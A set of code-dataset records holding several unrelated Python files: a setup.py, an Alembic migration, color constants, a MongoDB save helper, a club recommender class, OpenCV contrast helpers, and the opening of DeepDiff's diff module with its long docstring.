'bjh')\r\n\r\n","sub_path":"inquiries/operator_improvement.py","file_name":"operator_improvement.py","file_ext":"py","file_size_in_byte":10499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298886998","text":"from setuptools import setup, find_packages\n\nversion_parts = (7, 10, 0)\nversion = '.'.join(map(str, version_parts))\n\ngh_lenses =\\\n 'git+https://github.com/ingolemo/python-lenses.git#egg=lenses'\n\nsetup(\n name='tryp',\n description='fp data structures',\n version=version,\n author='Torsten Schmits',\n author_email='torstenschmits@gmail.com',\n license='MIT',\n url='https://github.com/tek/tryp',\n packages=find_packages(exclude=['unit', 'unit.*']),\n install_requires=[\n 'fn',\n 'toolz',\n 'lenses',\n ],\n tests_require=[\n 'spec',\n 'flexmock',\n 'sure',\n ],\n dependency_links=[\n gh_lenses,\n ]\n)\n","sub_path":"pypi_install_script/tryp-7.10.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136869359","text":"\"\"\"add root tables\n\nRevision ID: ea22133a5f12\nRevises:\nCreate Date: 2019-06-26 09:50:57.401060\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport geoalchemy2\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ea22133a5f12'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.execute('CREATE SCHEMA bdc')\n\n op.create_table('users',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('full_name', sa.String(), nullable=False),\n sa.Column('email', sa.String(), nullable=False),\n sa.Column('password', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n schema='bdc'\n )\n op.create_table('luc_classification_system',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('authority_name', sa.Text(), nullable=False),\n sa.Column('system_name', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['bdc.users.id'], ondelete='NO ACTION'),\n sa.PrimaryKeyConstraint('id'),\n schema='bdc'\n )\n op.create_table('luc_class',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('class_name', sa.Text(), nullable=False),\n sa.Column('description', sa.Text(), nullable=False),\n sa.Column('luc_classification_system_id', sa.Integer(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['luc_classification_system_id'], ['bdc.luc_classification_system.id'], ondelete='NO ACTION'),\n sa.ForeignKeyConstraint(['parent_id'], ['bdc.luc_class.id'], ondelete='NO ACTION'),\n sa.ForeignKeyConstraint(['user_id'], ['bdc.users.id'], ondelete='NO ACTION'),\n sa.PrimaryKeyConstraint('id'),\n schema='bdc'\n )\n op.create_table('observation',\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('start_date', sa.Date(), nullable=False),\n sa.Column('end_date', sa.Date(), nullable=False),\n sa.Column('location', geoalchemy2.types.Geometry(geometry_type='POINT', srid=4326), nullable=True),\n sa.Column('class_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['class_id'], ['bdc.luc_class.id'], ondelete='NO ACTION'),\n sa.ForeignKeyConstraint(['user_id'], ['bdc.users.id'], ondelete='NO ACTION'),\n sa.PrimaryKeyConstraint('id'),\n schema='bdc'\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('observation', schema='bdc')\n op.drop_table('luc_class', schema='bdc')\n op.drop_table('luc_classification_system', schema='bdc')\n op.drop_table('users', schema='bdc')\n\n op.execute('DROP SCHEMA bdc')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ea22133a5f12_add_root_tables.py","file_name":"ea22133a5f12_add_root_tables.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182130477","text":"\"\"\"\nGlobal constants\n\"\"\"\n\n# Colors\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nblue = (0, 0, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\n\n\n# Screen dimensions\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 600\nscreenSize = (SCREEN_WIDTH, SCREEN_HEIGHT)\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"211242068","text":"from mongoengine import Document\nclass MongoService:\n \"\"\"\n This class provides various MongoDb releated services. Its lot more easier to seperate the DB Operations\n into a seperate service than directly writing DB related code in each service.\n \"\"\"\n\n @staticmethod\n def save_to_db(mongo_obj:Document):\n \"\"\"\n This function receives a MongoEngine document object and save it in the database.\n :param mongo_obj:\n :return:\n \"\"\"\n try:\n db_result = mongo_obj.save()\n return True,db_result.id\n except Exception as e:\n False,str(e)\n\n","sub_path":"Services/MongoService.py","file_name":"MongoService.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"245714016","text":"####### RECOMMENDER.PY #######\n####### This file contains the Recommender class. A Recommender object runs #######\n####### the whole recommender system (except the GUI) #######\n\nfrom Recommender_Classes import Club\nfrom Recommender_Classes import User\nfrom Recommender_Classes import Event\nfrom Recommender_Classes import Interest\n\n# import to read the Excel file data\nimport pandas as pd\nimport xlrd\n\nclass Recommender:\n \"\"\"The hub of activity for the project\"\"\"\n\n # all variables are pointers\n # instance variables\n __users = [] # array of students\n __clubs = [] # array of clubs\n __interests = [] # array of possible interests\n\n # the constructor for the recommender class\n # adds the clubs from the excel file\n def __init__(self):\n self.addExcelClubs()\n\n # create a user and add to the __user dictionary\n # param: student's ID\n # returns: the new user\n def addUser(self, id):\n newUser = User(id) # call __init__ of the user class\n self.__users.append(newUser) # add the user to the dict\n return newUser\n\n # add a new club to the list\n # param: the name of the club, its category, and its ID\n # returns: the new club\n def addClub(self, clubName, clubCategory, clubID, description):\n newClub = Club(clubName, clubCategory, clubID, description, self)\n self.__clubs.append(newClub)\n return newClub\n\n # adds an interest to the list of possibilities (__userInterests)\n # param: the interest id, the interest name, and its category id\n # returns: a None object\n def addInterestToList(self, interestId, interestName, interestCategoryId):\n newInterest = Interest(interestName)\n self.__interests.append(newInterest)\n return None\n\n # gets the club based on the club name\n # returns the id of the club if it is found; o.w. returns -1\n def getClub(self, clubName):\n for club in self.__clubs:\n if(clubName.lower() == club.getClubName().lower()):\n return club # return the pointer to the club\n return -1 # something went wrong if I'm here..\n\n # gets the recommendation from the user based on their clubs and returns it\n # param: student's ID\n # returns the recommendation\n def createClubRecommendation(self, id):\n # set recommendation to None (NULL) so it has the scope of the method\n recommendation = None\n for user in self.__users:\n if(user.id == id):\n # call findClub() in the user to get recommendation\n recommendation = user.findClub()\n return recommendation\n return -1\n\n # returns the user that is being referenced\n # param: the object itself and the student's id\n # returns: the user object if it is found\n def getUser(self, id):\n for user in self.__users:\n if(user.id == id):\n return user\n return None\n\n # looks at the user's interests and recommends a club based on them\n # param: the id of the student for which to get the recommendation and the object itself\n # returns: the interest object to the caller\n def createInterestRecommendation(self, id):\n user = self.getUser(id)\n if(not user == None):\n recommendation = user.getInterestRecommendation()\n return recommendation\n\n # gets the next club event\n # param: the club object to look at\n # returns: the event\n def getNextClubEvent(self, club):\n event = club.getNextEvent()\n return event\n\n # adds the clubs from the excel file and creates the categories\n # NOTE: categories are acting as the interests at this point\n # param: none to be passed but it takes the self\n # returns: None\n def addExcelClubs(self):\n excel_file = 'data/Clubs.xlsx'\n\n excelClubs = pd.read_excel(excel_file)\n\n for index, rows in excelClubs.iterrows():\n # look for the category in the interests\n category = rows['Category']\n foundInInterests = False\n # add the club\n self.addClub(rows['Name'], rows['Category'], rows['ID'], rows['Description'])\n newClub = self.__clubs[len(self.__clubs)-1]\n for interest in self.__interests:\n if (category == interest.getInterestName()):\n # connect the club to it's interest that we just found\n interest.addRelatedClub(newClub)\n foundInInterests = True\n if(foundInInterests == False): # if the interest was not found\n # add the interest cause it doesn't already exist\n self.addInterestToList(0, category, 0)\n # connect the two\n self.__interests[len(self.__interests)-1].addRelatedClub(newClub)\n return None\n\n # will find the interest object based on the name\n # param: the string name of the interest\n # return: the interest if it's found; o.w. nothing\n def __findInterest(self, interestName):\n for interest in self.__interests:\n if(interest.getInterestName() == interestName):\n return interest\n\n # adds an interest to the user\n # param: the student's id and the string name of the interest\n # returns: None\n def addUserInterest(self, id, interestName):\n user = self.getUser(id)\n if(user != None):\n interest = self.__findInterest(interestName)\n user.addInterest(interest)\n return None\n\n # adds an event to a club\n # param: the club name (string), the event name (string), date (datetime object), location (string), and description (string)\n # returns: 0\n def addEventToClub(self, clubName, name, date, location, description):\n club = self.getClub(clubName)\n event = Event(name, date, club, location, description)\n club.addEvent(event)\n return 0\n\n # returns a list of the next upcoming event for each of the user's clubs\n # param: the user's id numbers\n # returns: a list(/array) of events\n def getUserUpcomingEvents(self, idNumber):\n user = self.getUser(idNumber)\n eventList = user.getNextEvents()\n return eventList\n\n # get the names of all the clubs\n # param: none\n # returns: a list of club names (strings)\n def getClubNames(self):\n clubNames = []\n for club in self.__clubs:\n clubNames.append(club.getClubName())\n return clubNames\n","sub_path":"recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"317720059","text":"import cv2\nimport numpy as np\n\n\ndef stretchlim(img, tol=(0.0, 0.99)):\n tol_low = tol[0]\n tol_high = tol[1]\n\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\n cdf = np.cumsum(hist) / np.sum(hist)\n ilow = np.where(cdf > tol_low)[0]\n ihigh = np.where(cdf >= tol_high)[0]\n th = (ilow, ihigh)\n return th\n\n\ndef imadjust(img, th):\n img = np.clip(img, th[0], th[1])\n img = cv2.equalizeHist(img)\n return img\n\n\ndef adjust_iris(img, r_th=(0.05, 0.95)):\n th = stretchlim(img, (0.0, 0.99))\n rfl = img >= th[1]\n eps_shape = int(np.round(0.005 * img.size))\n rfl = cv2.morphologyEx(rfl, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_RECT, (eps_shape, eps_shape)))\n rfl = cv2.dilate(rfl, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7)))\n\n th = stretchlim(img * (1 - rfl), r_th)\n img = imadjust(img, th)\n return img\n\n\ndef enh_contrast(img):\n img = np.clip(img, stretchlim(img, (0.05, 0.95)))\n return cv2.equalizeHist(img)\n","sub_path":"util/img_enhance.py","file_name":"img_enhance.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62461044","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# In order to run the docstrings:\n# python3 -m deepdiff.diff\n# You might need to run it many times since dictionaries come in different orders\n# every time you run the docstrings.\n# However the docstring expects it in a specific order in order to pass!\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport difflib\nimport logging\nimport jsonpickle\n\nfrom decimal import Decimal\n\nfrom collections import Mapping\nfrom collections import Iterable\n\nfrom deepdiff.helper import py3, strings, bytes_type, numbers, ListItemRemovedOrAdded, notpresent, IndexedHash, Verbose\nfrom deepdiff.model import RemapDict, ResultDict, TextResult, TreeResult, DiffLevel\nfrom deepdiff.model import DictRelationship, AttributeRelationship # , REPORT_KEYS\nfrom deepdiff.model import SubscriptableIterableRelationship, NonSubscriptableIterableRelationship, SetRelationship\nfrom deepdiff.contenthash import DeepHash\n\nif py3: # pragma: no cover\n from itertools import zip_longest\nelse: # pragma: no cover\n from itertools import izip_longest as zip_longest\n\nlogger = logging.getLogger(__name__)\n\n\nclass DeepDiff(ResultDict):\n r\"\"\"\n **DeepDiff**\n\n Deep Difference of dictionaries, iterables, strings and almost any other object.\n It will recursively look for all the changes.\n\n DeepDiff 3.0 added the concept of views.\n There is a default \"text\" view and a \"tree\" view.\n\n **Parameters**\n\n t1 : A dictionary, list, string or any python object that has __dict__ or __slots__\n This is the first item to be compared to the second item\n\n t2 : dictionary, list, string or almost any python object that has __dict__ or __slots__\n The second item is to be compared to the first one\n\n ignore_order : Boolean, defalt=False ignores orders for iterables.\n Note that if you have iterables contatining any unhashable, ignoring order can be expensive.\n Normally ignore_order does not report duplicates and repetition changes.\n In order to report repetitions, set report_repetition=True in addition to ignore_order=True\n\n report_repetition : Boolean, default=False reports repetitions when set True\n ONLY when ignore_order is set True too. This works for iterables.\n This feature currently is experimental and is not production ready.\n\n significant_digits : int >= 0, default=None.\n If it is a non negative integer, it compares only that many digits AFTER\n the decimal point.\n\n This only affects floats, decimal.Decimal and complex.\n\n Internally it uses \"{:.Xf}\".format(Your Number) to compare numbers where X=significant_digits\n\n Note that \"{:.3f}\".format(1.1135) = 1.113, but \"{:.3f}\".format(1.11351) = 1.114\n\n For Decimals, Python's format rounds 2.5 to 2 and 3.5 to 4 (to the closest even number)\n\n verbose_level : int >= 0, default = 1.\n Higher verbose level shows you more details.\n For example verbose level 1 shows what dictionary item are added or removed.\n And verbose level 2 shows the value of the items that are added or removed too.\n\n exclude_paths: list, default = None.\n List of paths to exclude from the report.\n\n exclude_types: list, default = None.\n List of object types to exclude from the report.\n\n view: string, default = text\n Starting the version 3 you can choosethe view into the deepdiff results.\n The default is the text view which has been the only view up until now.\n The new view is called the tree view which allows you to traverse through\n the tree of changed items.\n\n **Returns**\n\n A DeepDiff object that has already calculated the difference of the 2 items.\n\n **Supported data types**\n\n int, string, unicode, dictionary, list, tuple, set, frozenset, OrderedDict, NamedTuple and custom objects!\n\n **Text View**\n\n Text view is the original and currently the default view of DeepDiff.\n\n It is called text view because the results contain texts that represent the path to the data:\n\n Example of using the text view.\n >>> from deepdiff import DeepDiff\n >>> t1 = {1:1, 3:3, 4:4}\n >>> t2 = {1:1, 3:3, 5:5, 6:6}\n >>> ddiff = DeepDiff(t1, t2)\n >>> print(ddiff)\n {'dictionary_item_added': {'root[5]', 'root[6]'}, 'dictionary_item_removed': {'root[4]'}}\n\n So for example ddiff['dictionary_item_removed'] is a set if strings thus this is called the text view.\n\n .. seealso::\n The following examples are using the *default text view.*\n The Tree View is introduced in DeepDiff v3 and provides\n traversing capabilitie through your diffed data and more!\n Read more about the Tree View at the bottom of this page.\n\n Importing\n >>> from deepdiff import DeepDiff\n >>> from pprint import pprint\n\n Same object returns empty\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = t1\n >>> print(DeepDiff(t1, t2))\n {}\n\n Type of an item has changed\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:\"2\", 3:3}\n >>> pprint(DeepDiff(t1, t2), indent=2)\n { 'type_changes': { 'root[2]': { 'new_type': ,\n 'new_value': '2',\n 'old_type': ,\n 'old_value': 2}}}\n\n Value of an item has changed\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:4, 3:3}\n >>> pprint(DeepDiff(t1, t2, verbose_level=0), indent=2)\n {'values_changed': {'root[2]': {'new_value': 4, 'old_value': 2}}}\n\n Item added and/or removed\n >>> t1 = {1:1, 3:3, 4:4}\n >>> t2 = {1:1, 3:3, 5:5, 6:6}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff)\n {'dictionary_item_added': {'root[5]', 'root[6]'},\n 'dictionary_item_removed': {'root[4]'}}\n\n Set verbose level to 2 in order to see the added or removed items with their values\n >>> t1 = {1:1, 3:3, 4:4}\n >>> t2 = {1:1, 3:3, 5:5, 6:6}\n >>> ddiff = DeepDiff(t1, t2, verbose_level=2)\n >>> pprint(ddiff, indent=2)\n { 'dictionary_item_added': {'root[5]': 5, 'root[6]': 6},\n 'dictionary_item_removed': {'root[4]': 4}}\n\n String difference\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world\"}}\n >>> t2 = {1:1, 2:4, 3:3, 4:{\"a\":\"hello\", \"b\":\"world!\"}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'values_changed': { 'root[2]': {'new_value': 4, 'old_value': 2},\n \"root[4]['b']\": { 'new_value': 'world!',\n 'old_value': 'world'}}}\n\n\n String difference 2\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world!\\nGoodbye!\\n1\\n2\\nEnd\"}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world\\n1\\n2\\nEnd\"}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'values_changed': { \"root[4]['b']\": { 'diff': '--- \\n'\n '+++ \\n'\n '@@ -1,5 +1,4 @@\\n'\n '-world!\\n'\n '-Goodbye!\\n'\n '+world\\n'\n ' 1\\n'\n ' 2\\n'\n ' End',\n 'new_value': 'world\\n1\\n2\\nEnd',\n 'old_value': 'world!\\n'\n 'Goodbye!\\n'\n '1\\n'\n '2\\n'\n 'End'}}}\n\n >>>\n >>> print (ddiff['values_changed'][\"root[4]['b']\"][\"diff\"])\n --- \n +++ \n @@ -1,5 +1,4 @@\n -world!\n -Goodbye!\n +world\n 1\n 2\n End\n\n\n Type change\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":\"world\\n\\n\\nEnd\"}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'type_changes': { \"root[4]['b']\": { 'new_type': ,\n 'new_value': 'world\\n\\n\\nEnd',\n 'old_type': ,\n 'old_value': [1, 2, 3]}}}\n\n And if you don't care about the value of items that have changed type, please set verbose level to 0\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:\"2\", 3:3}\n >>> pprint(DeepDiff(t1, t2, verbose_level=0), indent=2)\n { 'type_changes': { 'root[2]': { 'new_type': ,\n 'old_type': }}}\n\n List difference\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3, 4]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2]}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n {'iterable_item_removed': {\"root[4]['b'][2]\": 3, \"root[4]['b'][3]\": 4}}\n\n List difference 2:\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 3, 2, 3]}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'iterable_item_added': {\"root[4]['b'][3]\": 3},\n 'values_changed': { \"root[4]['b'][1]\": {'new_value': 3, 'old_value': 2},\n \"root[4]['b'][2]\": {'new_value': 2, 'old_value': 3}}}\n\n List difference ignoring order or duplicates: (with the same dictionaries as above)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 3, 2, 3]}}\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True)\n >>> print (ddiff)\n {}\n\n List difference ignoring order but reporting repetitions:\n >>> from deepdiff import DeepDiff\n >>> from pprint import pprint\n >>> t1 = [1, 3, 1, 4]\n >>> t2 = [4, 4, 1]\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True, report_repetition=True)\n >>> pprint(ddiff, indent=2)\n { 'iterable_item_removed': {'root[1]': 3},\n 'repetition_change': { 'root[0]': { 'new_indexes': [2],\n 'new_repeat': 1,\n 'old_indexes': [0, 2],\n 'old_repeat': 2,\n 'value': 1},\n 'root[3]': { 'new_indexes': [0, 1],\n 'new_repeat': 2,\n 'old_indexes': [3],\n 'old_repeat': 1,\n 'value': 4}}}\n\n List that contains dictionary:\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:1, 2:2}]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:3}]}}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint (ddiff, indent = 2)\n { 'dictionary_item_removed': {\"root[4]['b'][2][2]\"},\n 'values_changed': {\"root[4]['b'][2][1]\": {'new_value': 3, 'old_value': 1}}}\n\n Sets:\n >>> t1 = {1, 2, 8}\n >>> t2 = {1, 2, 3, 5}\n >>> ddiff = DeepDiff(t1, t2)\n >>> pprint(ddiff)\n {'set_item_added': {'root[5]', 'root[3]'}, 'set_item_removed': {'root[8]'}}\n\n Named Tuples:\n >>> from collections import namedtuple\n >>> Point = namedtuple('Point', ['x', 'y'])\n >>> t1 = Point(x=11, y=22)\n >>> t2 = Point(x=11, y=23)\n >>> pprint (DeepDiff(t1, t2))\n {'values_changed': {'root.y': {'new_value': 23, 'old_value': 22}}}\n\n Custom objects:\n >>> class ClassA(object):\n ... a = 1\n ... def __init__(self, b):\n ... self.b = b\n ...\n >>> t1 = ClassA(1)\n >>> t2 = ClassA(2)\n >>>\n >>> pprint(DeepDiff(t1, t2))\n {'values_changed': {'root.b': {'new_value': 2, 'old_value': 1}}}\n\n Object attribute added:\n >>> t2.c = \"new attribute\"\n >>> pprint(DeepDiff(t1, t2))\n {'attribute_added': {'root.c'},\n 'values_changed': {'root.b': {'new_value': 2, 'old_value': 1}}}\n\n Approximate decimals comparison (Significant digits after the point):\n >>> t1 = Decimal('1.52')\n >>> t2 = Decimal('1.57')\n >>> DeepDiff(t1, t2, significant_digits=0)\n {}\n >>> DeepDiff(t1, t2, significant_digits=1)\n {'values_changed': {'root': {'old_value': Decimal('1.52'), 'new_value': Decimal('1.57')}}}\n\n Approximate float comparison (Significant digits after the point):\n >>> t1 = [ 1.1129, 1.3359 ]\n >>> t2 = [ 1.113, 1.3362 ]\n >>> pprint(DeepDiff(t1, t2, significant_digits=3))\n {}\n >>> pprint(DeepDiff(t1, t2))\n {'values_changed': {'root[0]': {'new_value': 1.113, 'old_value': 1.1129},\n 'root[1]': {'new_value': 1.3362, 'old_value': 1.3359}}}\n >>> pprint(DeepDiff(1.23*10**20, 1.24*10**20, significant_digits=1))\n {'values_changed': {'root': {'new_value': 1.24e+20, 'old_value': 1.23e+20}}}\n\n\n .. note::\n All the examples for the text view work for the tree view too. You just need to set view='tree' to get it in tree form.\n\n\n **Tree View**\n\n Starting the version 3 You can chooe the view into the deepdiff results.\n The tree view provides you with tree objects that you can traverse through to find\n the parents of the objects that are diffed and the actual objects that are being diffed.\n This view is very useful when dealing with nested objects.\n Note that tree view always returns results in the form of Python sets.\n\n You can traverse through the tree elements!\n\n .. note::\n The Tree view is just a different representation of the diffed data.\n Behind the scene, DeepDiff creates the tree view first and then converts it to textual representation for the text view.\n\n .. code:: text\n\n +---------------------------------------------------------------+\n | |\n | parent(t1) parent node parent(t2) |\n | + ^ + |\n +------|--------------------------|---------------------|-------+\n | | | up |\n | Child | | | ChildRelationship\n | Relationship | | |\n | down | | |\n +------|----------------------|-------------------------|-------+\n | v v v |\n | child(t1) child node child(t2) |\n | |\n +---------------------------------------------------------------+\n\n\n :up: Move up to the parent node\n :down: Move down to the child node\n :path(): Get the path to the current node\n :t1: The first item in the current node that is being diffed\n :t2: The second item in the current node that is being diffed\n :additional: Additional information about the node i.e. repetition\n :repetition: Shortcut to get the repetition report\n\n\n The tree view allows you to have more than mere textual representaion of the diffed objects.\n It gives you the actual objects (t1, t2) throughout the tree of parents and children.\n\n **Examples Tree View**\n\n .. note::\n The Tree View is introduced in DeepDiff 3.\n Set view='tree' in order to use this view.\n\n Value of an item has changed (Tree View)\n >>> from deepdiff import DeepDiff\n >>> from pprint import pprint\n >>> t1 = {1:1, 2:2, 3:3}\n >>> t2 = {1:1, 2:4, 3:3}\n >>> ddiff_verbose0 = DeepDiff(t1, t2, verbose_level=0, view='tree')\n >>> ddiff_verbose0\n {'values_changed': {}}\n >>>\n >>> ddiff_verbose1 = DeepDiff(t1, t2, verbose_level=1, view='tree')\n >>> ddiff_verbose1\n {'values_changed': {}}\n >>> set_of_values_changed = ddiff_verbose1['values_changed']\n >>> # since set_of_values_changed includes only one item in a set\n >>> # in order to get that one item we can:\n >>> (changed,) = set_of_values_changed\n >>> changed # Another way to get this is to do: changed=list(set_of_values_changed)[0]\n \n >>> changed.t1\n 2\n >>> changed.t2\n 4\n >>> # You can traverse through the tree, get to the parents!\n >>> changed.up\n \n\n List difference (Tree View)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3, 4]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2]}}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> ddiff\n {'iterable_item_removed': {, }}\n >>> # Note that the iterable_item_removed is a set. In this case it has 2 items in it.\n >>> # One way to get one item from the set is to convert it to a list\n >>> # And then get the first item of the list:\n >>> removed = list(ddiff['iterable_item_removed'])[0]\n >>> removed\n \n >>>\n >>> parent = removed.up\n >>> parent\n \n >>> parent.path()\n \"root[4]['b']\"\n >>> parent.t1\n [1, 2, 3, 4]\n >>> parent.t2\n [1, 2]\n >>> parent.up\n \n >>> parent.up.up\n \n >>> parent.up.up.t1\n {1: 1, 2: 2, 3: 3, 4: {'a': 'hello', 'b': [1, 2, 3, 4]}}\n >>> parent.up.up.t1 == t1 # It is holding the original t1 that we passed to DeepDiff\n True\n\n List difference 2 (Tree View)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, 3]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 3, 2, 3]}}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> pprint(ddiff, indent = 2)\n { 'iterable_item_added': {},\n 'values_changed': { ,\n }}\n >>>\n >>> # Note that iterable_item_added is a set with one item.\n >>> # So in order to get that one item from it, we can do:\n >>>\n >>> (added,) = ddiff['iterable_item_added']\n >>> added\n \n >>> added.up.up\n \n >>> added.up.up.path()\n 'root[4]'\n >>> added.up.up.down\n \n >>>\n >>> # going up twice and then down twice gives you the same node in the tree:\n >>> added.up.up.down.down == added\n True\n\n List difference ignoring order but reporting repetitions (Tree View)\n >>> t1 = [1, 3, 1, 4]\n >>> t2 = [4, 4, 1]\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True, report_repetition=True, view='tree')\n >>> pprint(ddiff, indent=2)\n { 'iterable_item_removed': {},\n 'repetition_change': { ,\n }}\n >>>\n >>> # repetition_change is a set with 2 items.\n >>> # in order to get those 2 items, we can do the following.\n >>> # or we can convert the set to list and get the list items.\n >>> # or we can iterate through the set items\n >>>\n >>> (repeat1, repeat2) = ddiff['repetition_change']\n >>> repeat1 # the default verbosity is set to 1.\n \n >>> # The actual data regarding the repetitions can be found in the repetition attribute:\n >>> repeat1.repetition\n {'old_repeat': 1, 'new_repeat': 2, 'old_indexes': [3], 'new_indexes': [0, 1]}\n >>>\n >>> # If you change the verbosity, you will see less:\n >>> ddiff = DeepDiff(t1, t2, ignore_order=True, report_repetition=True, view='tree', verbose_level=0)\n >>> ddiff\n {'repetition_change': {, }, 'iterable_item_removed': {}}\n >>> (repeat1, repeat2) = ddiff['repetition_change']\n >>> repeat1\n \n >>>\n >>> # But the verbosity level does not change the actual report object.\n >>> # It only changes the textual representaion of the object. We get the actual object here:\n >>> repeat1.repetition\n {'old_repeat': 1, 'new_repeat': 2, 'old_indexes': [3], 'new_indexes': [0, 1]}\n >>> repeat1.t1\n 4\n >>> repeat1.t2\n 4\n >>> repeat1.up\n \n\n List that contains dictionary (Tree View)\n >>> t1 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:1, 2:2}]}}\n >>> t2 = {1:1, 2:2, 3:3, 4:{\"a\":\"hello\", \"b\":[1, 2, {1:3}]}}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> pprint (ddiff, indent = 2)\n { 'dictionary_item_removed': {},\n 'values_changed': {}}\n\n Sets (Tree View):\n >>> t1 = {1, 2, 8}\n >>> t2 = {1, 2, 3, 5}\n >>> ddiff = DeepDiff(t1, t2, view='tree')\n >>> print(ddiff)\n {'set_item_removed': {}, 'set_item_added': {, }}\n >>> # grabbing one item from set_item_removed set which has one item only\n >>> (item,) = ddiff['set_item_removed']\n >>> item.up\n \n >>> item.up.t1 == t1\n True\n\n Named Tuples (Tree View):\n >>> from collections import namedtuple\n >>> Point = namedtuple('Point', ['x', 'y'])\n >>> t1 = Point(x=11, y=22)\n >>> t2 = Point(x=11, y=23)\n >>> 